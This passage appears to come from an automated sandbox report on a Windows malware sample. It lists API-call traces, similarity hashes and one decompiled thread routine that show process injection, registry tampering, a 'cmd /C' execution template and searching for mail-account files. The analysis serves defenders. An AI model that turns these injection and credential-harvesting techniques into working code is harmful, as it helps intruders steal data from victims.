  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C6241, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D87D7, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE2F9, Relevance: 5.1, APIs: 4, Instructions: 70 Total matches: 113string
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 64002

General

Root Process Name:d3d8sext.exe
Process MD5:C007415B17DF758F2ED04850F95EE60E
Total matches:155
Initial Analysis Report:Open
Initial sample Analysis ID:64002
Initial sample SHA 256:212D2CE18964D507A6FE50EE7C33E5EC4FC6B44DEDCC9463D5F6E2581E48E4C3
Initial sample name:crypt_0001_1096a.exe

Similar Executed Functions

Function 001D99D2, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B3278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001F1040, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226 Total matches: 134native
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Function 01B33E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B32E04, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 251 Total matches: 146registrystringmemory
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95threadsynchronization
Similarity
  • Total matches: 95
  • API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
  • String ID:
  • API String ID: 2699342322-0
  • Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
  • Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
  • Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
  • Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
C-Code - Quality: 100%
			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}













0x00401647
0x0040164f
0x00401664
0x0040166e
0x00401672
0x00401675
0x00401713
0x0040167b
0x0040168c
0x0040168e
0x00401692
0x00401695
0x004016fe
0x00401697
0x004016a0
0x004016a3
0x004016b4
0x004016e7
0x004016bb
0x004016c0
0x004016cd
0x004016d7
0x004016dc
0x004016dc
0x004016cd
0x004016f0
0x004016f0
0x00401704
0x0040170a
0x0040171c

APIs
  • CreateThread.KERNEL32(00000000,00000000,Function_00001034,?,00000000,?), ref: 0040166E
  • CreateThread.KERNEL32(00000000,00000000,Function_000010FB,?,00000000,?), ref: 0040168C
  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
  • GetExitCodeThread.KERNEL32(00000000,?), ref: 004016B0
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
  • GetExitCodeThread.KERNEL32(?,?), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 004015B9
  • TerminateThread.KERNEL32(?,?), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32 ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
